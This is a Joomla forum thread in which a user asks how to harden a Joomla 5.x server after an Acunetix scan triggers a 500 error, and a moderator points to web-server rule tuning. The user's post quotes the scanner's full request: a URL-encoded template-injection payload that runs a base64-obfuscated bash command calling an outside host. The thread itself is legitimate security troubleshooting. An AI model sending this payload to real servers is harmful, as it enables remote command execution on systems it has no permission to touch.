Acunetix "Internal Server Error"

Discussion regarding Joomla! 5.x security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
Post Reply
abernfr
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Tue Jul 18, 2023 2:11 pm

Acunetix "Internal Server Error"

Post by abernfr » Mon Apr 15, 2024 4:32 pm

Our Information Security group runs Acunetix on all of our servers. On our Joomla 5.x server it reports an Internal Server Error when Acunetix tries the below URL on the server. Is there any way to harden Joomla 5.x to avoid this error condition occurring? (Server name removed from link for security.)

https://{server_name}/media/templates/site/cassiopeia/js/template.min.js?241464=%23set(%24engine%3d%22%22)%0a%23set(%24proc%3d%24engine.getClass().forName(%22java.lang.Runtime%22).getRuntime().exec(%22bash%20-c%20%7beval%2c%24(%7btr%2c%2f%2b%2c_-%7d%3c%3c%3cbnNsb29rdXAgZDVuYW9ndmF6a2V2LW9maG8xaXV6eXR6cGZteHplY3V1OWxta2xieDhqZy5yODcubWU%3d%7c%7bbase64%2c--decode%7d)%7d%22))%0a%23set(%24null%3d%24proc.waitFor())%0a%23set(%24istr%3d%24proc.getInputStream())%0a%23set(%24chr%3d%24engine.getClass().forName(%22java.lang.Character%22))%0a%23set(%24output%3d%22%22)%0a%23set(%24string%3d%24engine.getClass().forName(%22java.lang.String%22))%0a%23foreach(%24i%20in%20%5b1..%24istr.available()%5d)%0a%23set(%24output%3d%24output.concat(%24string.valueOf(%24chr.toChars(%24istr.read()))))%0a%23end%0a%24%7boutput%7d

User avatar
toivo
Joomla! Master
Joomla! Master
Posts: 17517
Joined: Thu Feb 15, 2007 5:48 am
Location: Sydney, Australia

Re: Acunetix "Internal Server Error"

Post by toivo » Mon Apr 15, 2024 10:40 pm

Welcome to the Joomla forum!

AFAIK, in similar cases, when an Apache web server that runs the ModSecurity module reports a 500 Internal Server Error triggered by a rule that is too restrictive, the host managing the server modifies the rule and the 500 error is gone. There is no need to alter the Joomla core.
Toivo Talikka, Global Moderator

abernfr
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Tue Jul 18, 2023 2:11 pm

Re: Acunetix "Internal Server Error"

Post by abernfr » Wed May 01, 2024 2:31 pm

I am running Joomla on IIS 10.0


Post Reply

Return to “Security in Joomla! 5.x”